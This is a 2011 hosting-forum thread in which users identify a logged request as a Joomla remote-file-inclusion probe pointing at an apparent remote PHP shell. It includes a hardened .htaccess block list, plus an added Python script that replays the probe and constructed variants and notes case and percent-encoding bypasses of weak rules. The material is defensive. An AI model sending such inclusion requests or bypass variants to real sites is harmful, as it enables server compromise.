logs question
pelagia
04-19-2011, 04:34 PM
06/Apr/2011:16:08:22 -0400] "GET /mermaid.shtml//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.akouavie.com/libraries/pear/a? HTTP/1.1" 200 10511 "-" "Mozilla/5.0"
151.27.211.230
I see these types of entries in my log files, just wondering what they are?
Thanks
Terra
04-19-2011, 08:06 PM
Those are probes against your site, most likely by zombies, trying to exploit security vulnerabilities via cross site script injections through unsanitized external variables (in this case: mosConfig_absolute_path) that are later used in a PHP include() or require()... In this case, they are probing for a Joomla! vulnerability...
Most likely, the 'http://www.xxxxx/libraries/pear/a' file is a PHP remote shell which attackers can use to gain access to your account as it will run with your user and group credentials...
Why they tried this against a '.shtml' file is beyond me as they seem to be casting the net out pretty wide...
pelagia
04-19-2011, 09:13 PM
Oh thanks for that info Terra, can I just ignore these then?
Terra
04-20-2011, 01:30 AM
If you aren't running Joomla!, then you should be fine...
However, as a cautionary tale, please keep your operations up to date as these rogues can hit your site at any time trying to sniff out vulnerable software...
manfred
04-20-2011, 03:48 AM
If you are running Joomla, I have an idea how you can block such things...
You have to check the following things:
1.) Do you have the .htaccess file of Joomla activated? If not, do so.
2.) Add the following code to your .htaccess file... the important lines are marked in red!!
3.) Password protect your administration directory!!
### Pwd-Protection of configuration.php
AuthUserFile /big/dom/xDOMAIN/.sys_opr_dir/CNC_Protect/.passwd
AuthName Protected_Area
AuthType Basic
<Files "configuration.php">
require user USERNAME
</Files>
##
# @version $Id: htaccess.txt 14401 2010-01-26 14:10:00Z louis $
# @package Joomla
# @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##
#####################################################
# READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations. It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that disallows changing it in
# your .htaccess file. If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your sef url's. If they work,
# it has been set by your server administrator and you do not need it set here.
#
#####################################################
## Can be commented out if causes errors, see notes above.
Options +FollowSymLinks
#
# mod_rewrite in use
RewriteEngine On
########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
## Deny access to extension xml files (uncomment out to activate)
#<Files ~ "\.xml$">
#Order allow,deny
#Deny from all
#Satisfy all
#</Files>
## End of deny access to extension xml files
# Block out any query string carrying a remote URL (remote file inclusion probes).
# [NC] makes it case-insensitive; the %3A%2F%2F alternative catches a percent-encoded "://",
# which mod_rewrite would otherwise not see because QUERY_STRING is matched as sent.
RewriteCond %{QUERY_STRING} (https?|ftp)(://|%3A%2F%2F) [NC,OR]
# Block out any script trying to set a mosConfig_ variable via URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits
# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update Your Joomla! Directory (just / for root)
# RewriteBase /
########## Begin - Joomla! core SEF Section
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$ [NC]
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
#
########## End - Joomla! core SEF Section
Be aware that this was the original .htaccess file from Joomla. I manually edited the .htaccess file to improve the security of my Joomla installation. Make a copy of your original file in case something goes wrong.
xDOMAIN: found in your CNC
USERNAME: this should be an existing username from your automated CNC password protection.
If you have any questions, send me a short private message.
Manfred
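As an added example, not code from the thread, from Joomla or from the hosting provider: a small Python script that does by machine what Terra did by eye on pelagia's log line and what Manfred's .htaccess rules do in Apache. It parses Apache combined-format lines, decodes the query parameters the way PHP would before an include(), flags any parameter whose value is a remote URL (the RFI probe Terra describes), and then runs the six query-string conditions of the Joomla .htaccess, translated to Python regexes, against the raw query string exactly as mod_rewrite sees it. The log lines are constructed: the first reproduces the probe from the thread with the client IP placed at the front of the line (the post shows the IP separately, so that placement is an assumption), the rest are invented and use documentation address ranges. The URL condition is deliberately modelled in its weak, case-sensitive form so the bypasses show; the `HARDENED_REMOTE_URL` pattern beside it is my suggestion, not part of the posted file.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log in Apache "combined" format. Line 1 is the probe quoted in
# the thread with the client IP put back at the front of the line (an assumption:
# the post shows the IP separately); the other lines are invented and use
# documentation address ranges.
SAMPLE_LOG = """\
151.27.211.230 - - [06/Apr/2011:16:08:22 -0400] "GET /mermaid.shtml//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.akouavie.com/libraries/pear/a? HTTP/1.1" 200 10511 "-" "Mozilla/5.0"
198.51.100.7 - - [06/Apr/2011:16:09:01 -0400] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.9 - - [06/Apr/2011:16:10:45 -0400] "GET /index.php?page=HTTP://203.0.113.9/c.txt HTTP/1.1" 404 512 "-" "Mozilla/5.0"
203.0.113.9 - - [06/Apr/2011:16:11:02 -0400] "GET /index.php?page=http%3A%2F%2F203.0.113.9%2Fc.txt HTTP/1.1" 404 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The query-string conditions from the Joomla .htaccess, as Python regexes.
# mod_rewrite tests %{QUERY_STRING} as sent (no percent-decoding) and
# case-sensitively unless [NC] is given, so only the <script> rule is
# case-insensitive here, and "remote-url" is the URL condition in its weak,
# case-sensitive form (the stock `^(.*)http://(.*)` style rule).
HTACCESS_RULES = {
    "remote-url": re.compile(r"(https?|ftp)://"),
    "mosConfig_": re.compile(r"mosConfig_[a-zA-Z_]{1,21}(=|%3D)"),
    "base64": re.compile(r"base64_encode.*\(.*\)"),
    "script-tag": re.compile(r"(<|%3C).*script.*(>|%3E)", re.IGNORECASE),
    "GLOBALS": re.compile(r"GLOBALS(=|\[|%[0-9A-Z]{0,2})"),
    "_REQUEST": re.compile(r"_REQUEST(=|\[|%[0-9A-Z]{0,2})"),
}

# Suggested (my own, not from the posted file) replacement for "remote-url";
# the equivalent .htaccess line would be:
#   RewriteCond %{QUERY_STRING} (https?|ftp)(://|%3A%2F%2F) [NC,OR]
# It is case-insensitive and also catches a percent-encoded "://".
HARDENED_REMOTE_URL = re.compile(r"(https?|ftp)(://|%3A%2F%2F)", re.IGNORECASE)

# What a PHP include()/require() would receive once the value is decoded.
REMOTE_VALUE = re.compile(r"(https?|ftp)://", re.IGNORECASE)


def parse_line(line):
    """Split one combined-format line; returns None for lines that don't parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parts.query  # raw, still percent-encoded: what mod_rewrite sees
    # decoded name/value pairs: what PHP's $_GET (and register_globals) would hold
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def rfi_params(rec):
    """Decoded parameters whose value is a remote URL, i.e. candidate RFI payloads."""
    return [(k, v) for k, v in rec["params"] if REMOTE_VALUE.match(v)]


def matched_rules(rec):
    """Names of the .htaccess conditions that would fire on the raw query string."""
    return [name for name, rx in HTACCESS_RULES.items() if rx.search(rec["query"])]


def triage(log_text):
    """Classify every parsable line: RFI indicators vs. what the rules would block."""
    results = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        results.append({
            "ip": rec["ip"],
            "path": rec["path"],
            "rfi": rfi_params(rec),
            "blocked_by": matched_rules(rec),
            "hardened_remote_url": bool(HARDENED_REMOTE_URL.search(rec["query"])),
        })
    return results


if __name__ == "__main__":
    for r in triage(SAMPLE_LOG):
        verdict = "RFI probe" if r["rfi"] else "benign"
        print(f'{r["ip"]:<16} {verdict:<10} blocked_by={r["blocked_by"]} '
              f'hardened={r["hardened_remote_url"]} rfi={r["rfi"]}')
```

Run as-is, the probe from the thread is flagged as RFI and is blocked twice over, by the URL rule and by the mosConfig_ rule, while the ordinary com_content request is untouched. The two invented requests show the gap Manfred's rules leave when written without [NC]: an upper-cased `HTTP://` and a percent-encoded `http%3A%2F%2F` both decode to a remote URL inside PHP, but neither matches the case-sensitive, undecoded query string mod_rewrite tests, so they pass the rules and only the hardened pattern catches them. The same applies to the posted base64 rule, which matches only the literal `base64_encode`; extend it if you want `base64_decode` covered as well.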
pelagia
04-22-2011, 12:32 AM
Oh thanks guys, I'm not running Joomla so I should be okay, but what are my operations and how do I keep those up to date?
manfred
04-22-2011, 02:22 AM
Terra means that you should keep your installed scripts up-to-date. ;)
If your scripts are out of date, it could be possible that your website gets hacked.
pelagia
04-22-2011, 01:26 PM
Thank you manfred! I will do that.